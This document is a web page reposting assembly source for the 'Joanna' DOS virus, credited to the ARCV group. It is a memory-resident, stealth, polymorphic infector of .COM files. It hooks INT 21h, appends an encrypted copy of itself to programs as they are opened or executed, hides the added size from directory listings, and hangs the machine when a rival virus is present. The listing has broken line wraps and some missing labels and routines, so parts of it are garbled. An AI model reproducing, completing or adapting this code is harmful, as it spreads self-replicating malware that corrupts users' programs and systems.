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Joanna virus

2013年10月15日 ⁄ 综合 ⁄ 共 16806字 ⁄ 字号 评论关闭

        NAME Jo
        PAGE 55,132
        TITLE Jo Virus.

; This is Yet another virus from the ARCV, this one is called
; Joanna, it was written by Apache Warrior, ARCV President.
; It has Stealth features, it is a Resident infector of .COM files
; and uses the Cybertech Mutation Engine (TM) by Apache Warrior for
; its Polymorphic features.  There is a maximum of 3 unchanged bytes
; in the Encrypted code.

.model tiny

code segment


int_21ofs       equ 84h
int_21seg       equ 86h
length          equ offset handle-offset main
msglen          equ offset oldstart-offset msg
tsrlen          equ (offset findat-offset main)/10 
len             equ offset handle-offset main
virlen          equ (offset string-offset main2)/2
decryptlen      equ offset main2-offset main

                org 100h 

start:          jmp main
                db 0,0,0

main:           mov si,offset main2             ; SI offset for

                mov cx,virlen                   ; viri decrypt size
                db 2eh,81h,2ch                  ; decrypt
switch:         dw 0
                add si,02h
                dec cx
                jnz loop_1
main2:          call findoff                    ; find file ofset
findoff:        pop si                          ;
                sub si,offset findoff
                push ds
                push es
                push cs
                pop ds
                push cs
                pop es
                mov ax,0ff05h                   ; Test for Scythe2

                int 13h
                cmp ah,0e9h                     ; Check for Scythe2

                jnz haha                        ; no go on
                mov ah,09h                      ; Display message
                lea dx,[si+offset msg2]
                int 21h
                jmp $                           ; Crash the machine
haha:           mov ah,2ah                      ; Date Test
                int 21h                         ;
                cmp dx,1210h                    ; Is month the Oct.
                jnz main3                       ; no go on
                mov ah,09h                      ; Display Message
                lea dx,[si+offset msg]
                int 21h

main3:          mov di,0100h                    ; move old programs
                push si                         ; start back to the

                mov ax,offset oldstart          ;
                add si,ax                       ;
                mov cx,05h                      ;
                cld                             ;
                repz movsb                      ;

inst:           mov ax,0ffa4h                   ; check to see if

already instaled
                int 21h
                pop si                          ; bring back si
                cmp ax,42a1h
                je oldprog                      ; Yes return to old


tt2:            xor ax,ax                       ; Residency Routine
                push ax
                mov ax,ds                       ; Get MCB segment

                dec ax                          ;
                mov es,ax                       ; Put MCB segment

Address in es
                pop ds                          ;
                mov ax,word ptr ds:int_21ofs    ; Load Int 21h address

                mov cx,word ptr ds:int_21seg    ;
                mov word ptr cs:[si+int21],ax   ; Move Int 21h data to

                mov word ptr cs:[si+int21+2],cx ;
                cmp byte ptr es:[0],5ah         ; Check for Start of

                jne oldprog                     ; If no then quit
                mov ax,es:[3]                   ; Play with MCB to get

top of
                sub ax,0bch                     ; Memory and reserve

3,008 bytes
                jb  oldprog                     ; for Virus
                mov es:[3],ax                   ;
                sub word ptr es:[12h],0bch      ;
                mov es,es:[12h]                 ;
                push ds                         ;
                push cs                         ;
                pop ds                          ; Move Virus into

                mov di,0100h                    ; space allocated

                mov cx,len+5                    ;
                push si                         ;
                add si,0100h                    ;
                rep movsb                       ;
                pop si
                pop ds
                cli                             ; Stop Interrupts Very

                mov ax,offset new21             ; Load New Int 21h

                mov word ptr ds:int_21ofs,ax    ; address and store
                mov word ptr ds:int_21seg,es    ;
                sti                             ;

                mov di,0100h                    ; Return to Orginal
                pop es                          ; Program..
                pop ds                          ;
                push di                         ;
                ret                             ;

int21           dd 0h                           ; Storage For Int 21h


;   New interupt 21h Handler

sayitis:        mov ax,42a1h                    ; Install Check..

new21:          ;nop                            ; Sign byte
                cmp ax,0ffa4h                   ; Instalation Check
                je sayitis
                cmp ah,11h                      ; FCB Search file
                je adjust_FCB
                cmp ah,12h                      ; FCB Search Again
                je adjust_FCB
                cmp ah,4eh                      ; Handle Search file
                je adjust_FCB   
                cmp ah,4fh                      ; Handle Search Again
                je adjust_FCB
                cmp ah,3dh                      ; Are they opening a

                je intgo                        ; if no ignore
                cmp ah,4bh                      ; Exec Function
                jne noint
intgo:          push ax                         ; 4bh, 3dh Infect file
                push bx                         ; Handler save the

                push cx
                push es
                push si
                push di
                push dx
                push ds
                call checkit                    ; Call infect routine
                pop ds
                pop dx
                pop di
                pop si
                pop es
                pop cx
                pop bx
                pop ax
noint:          jmp cs:[int21]                  ; Return to Orginal

Int 21h

adjust_FCB:     push es                         ; Stealth Routine
                push bx
                push si
                push ax
                xor si,si
                and ah,40h                      ; Check for handle

                jz okFCB
                mov si,1                        ; Set flag
okFCB:          mov ah,2fh                      ; Get DTA Address
                int 21h
                pop ax                          ; Restore ax to

orginal function
                call i21                        ; value call it
                pushf                           ; save flags
                push ax                         ; save ax error code
                call adjust                     ; Call stealth adjust

                pop ax                          ; restore registers
                pop si
                pop bx
                pop es
                retf 2                          ; Return to caller

adjust:         pushf                           ; Stealth check

                cmp si,0                        ; Check flag set

                je fcb1
                jc repurn                       ; Check for Handle

Search error
                mov ah,byte ptr es:[bx+16h]     ; No error then carry

                and ah,01ah                     ; Check stealth stamp
                cmp ah,01ah                     ;
                jne repurn                      ;
                sub word ptr es:[bx+1ah],len    ; Infected then take

the viri size
repurn:         ret                             ; from file size.
fcb1:           popf                            ; Same again but for

the FCB
                cmp al,0ffh
                je meat_hook  
                cmp byte ptr es:[bx],0ffh
                jne xx2
                add bx,7
xx2:            mov ah,byte ptr es:[bx+17h]
                and ah,01ah
                cmp ah,01ah
                jne meat_hook
                sub word ptr es:[bx+1dh],len
meat_hook:      ret 

com_txt db 'COM',0                              ;

reset:                                          ; File Attrib routines
                mov cx,20h 
                mov al,01h
                mov ah,43h                      ; Alter file

i21:            pushf
                call cs:[int21]
exitsub:        ret  

checkit:                                        ; Infect routine
                push es                         ; Save some more

                push ds
                push ds                         ; Check to see if file

is a
                pop es                          ; .COM file if not

                push dx                         ; quit..
                pop di                          ;
                mov cx,0ffh                     ; Find '.' in File

                mov al,'.'                      ;
                repnz scasb                     ;
                push cs                         ;
                pop ds                          ;
                mov si,offset com_txt           ; Compare with COM

                mov cx,3                        ;
                rep cmpsb                       ;
                pop ds                          ; Restore Reg...
                pop es                          ;
                jnz exitsub                     ;

foundtype:      sub di,06h                      ; Check for

                cmp ds:[di],'DN'                ; Quit if found..
                je exitsub                      ;
                mov word ptr cs:[nameptr],dx    ; Save DS:DX pointer

for later
                mov word ptr cs:[nameptr+2],ds  ;
                mov al,00h                      ; Find Attributes of

file to infect
                call find_att                   ;
                jc exitsub                      ; Error Quit.

alteratr:       mov cs:[attrib],cx              ; Save them
                call reset                      ; Reset them to normal

                mov ax,3d02h                    ; Open file
                call i21       
                jc exitsub                      ; Error Quit
                push cs                         ; Set DS to CS
                pop ds                          ;
                mov ds:[handle],ax              ; Store handle

                mov ax,5700h                    ; Read file time and

                mov bx,ds:[handle]              ;
                call i21                        ;
ke9:            mov ds:[date],dx                ; Save DX
                or cx,1ah                       ; Set Stealth Stamp
                mov ds:[time],cx                ; Save CX
                mov ah,3fh                      ; Read in first 5

                mov cx,05h                      ; To save them
                mov dx,offset oldstart          ;
                call i21                        ;
closeit:        jc close2                       ; Error Quit

                mov ax,4202h                    ; Move filepointer to

                mov cx,0ffffh                   ; -5 bytes offset from

                mov dx,0fffbh                   ;
                call i21                        ;
                jc close                        ; Error Quit

                mov word ptr cs:si_val,ax       ; Save File saize for

                cmp ax,0ea60h                   ; See if too big
                jae close                       ; Yes then Quit

                mov ah,3fh                      ; Read in last 5 bytes
                mov cx,05h                      ;
                mov dx,offset tempmem           ;
                call i21                        ;
                jc close                        ; Error

                push cs                         ; Reset ES to CS
                pop es                          ;
                mov di,offset tempmem           ; Check if Already

                mov si,offset string            ;
                mov cx,5                        ;
                rep cmpsb                       ;
                jz close                        ; Yes the Close and

zapfile:                                        ; No Infect and Be

                mov ax,word ptr cs:si_val       ;
                add ax,2                        ;
                push cs                         ;
                pop ds                          ;
                mov word ptr ds:[jpover+1],ax   ; Setup new jump
                call mut_eng                    ; Call Mutation Engine
                mov ah,40h                      ; Save prog to end of

                mov bx,cs:[handle]              ; Load Handle
                mov cx,length                   ; LENGTH OF

                call i21                        ; Write away
close2:         jc close                        ; Quit if error

                push cs                         ; Reset DS to CS
                pop ds                          ;     
                mov ax,4200h                    ; Move File pointer to

                xor cx,cx                       ; of file
                cwd                             ; Clever way to XOR

                call i21                        ;
                jc close                        ; Error Quit..
                mov ah,40h                      ; Save new start
                mov cx,03h                      ;
                mov dx,offset jpover            ;
                call i21                        ;

close:          mov ax,5701h                    ; Restore Time and

                mov bx,ds:[handle]              ;
                mov cx,ds:[time]                ;
                mov dx,ds:[date]                ;
                call i21                        ;
                mov ah,3eh                      ; Close file
                call i21                        ;
exit_sub:       mov dx,word ptr [nameptr]       ; Reset Attributes to

as they where
                mov cx,ds:[attrib]              ;
                mov ds,word ptr cs:[nameptr+2]  ;
                call set_back                   ;
                ret                             ; Return to INT 21h


;               CyberTech Mutation Engine
;               This is Version Two of the Mutation Engine
;               Unlike others it is very much Virus Specific..  Works
;               Best on Resident Viruses..
;               To Call
;               si_val = File Size
;               Returns
;               DS:DX = Encrypted Virus Code, Use DS:DX pointer to
;                       Write From..

                mov ah,2ch                      ; Get Time
                call i21                        ;
                mov word ptr ds:[switch],dx     ; Use Sec./100th

counter as key
                mov word ptr ds:[switch2+1],dx  ; Save to Decrypt and

                mov ax,cs:[si_val]              ; Get file size
                mov dx,offset main2             ;
                add ax,dx                       ;
                mov word ptr [main+1],ax        ; Store to Decrypt

                xor byte ptr [loop_1+2],28h     ; Toggle Add/Sub
                xor byte ptr switch2,28h        ;       "
                push cs                         ; Reset Segment Regs.
                pop ds                          ;
                push cs                         ;
                pop ax                          ; Find Spare Segment
                sub ax,0bch                     ; and put in es
                mov es,ax                       ;
                mov si,offset main              ; Move Decrypt

                mov di,0100h                    ;
                mov cx,decryptlen               ;
                rep movsb                       ;
                mov si,offset main2             ; Start the code

                mov cx,virlen                   ;
loop_10:        lodsw                           ;
switch2:        add ax,0000                     ;
                stosw                           ;
                loop loop_10                    ;
                mov si,offset string            ; move ID string to

                mov cx,5                        ; new code
                rep movsb                       ;
                mov dx,0100h                    ; Set Registers to

encrypted Virus
                push es                         ; Location
                pop ds                          ;
                ret                             ; Return

; Data Section, contains Messages etc.

;               Little message to the Wife to Be..

msg             db 'Looking Good Slimline Joanna.',0dh,0ah
                db 'Made in England by Apache Warrior, ARCV

                db 'Jo Ver. 1.11 (c) Apache Warrior 92.',0dh,0ah
                db '$'

msg2            db 'I Love You Joanna, Apache..',0dh,0ah,'$'

virus_name      db '[JO]',00h,                          ; Virus Name..
author          db 'By Apache Warrior, ARCV Pres.'      ; Thats me..
filler          dd 0h

oldstart:       mov ax,4c00h                    ; Orginal program

                int 21h

j100h           dd 0100h                        ; Stores for jumps etc
jpover          db 0e9h,00,00h                  ;

string          db '65fd3'                      ; ID String

heap:                                           ; This code is not

handle          dw 0h
nameptr         dd 0h
attrib          dw 0h
date            dw 0h
time            dw 0h
tempmem         db 10h dup (?)
findat          db 0h
si_val          dw 0h

code ends

end start
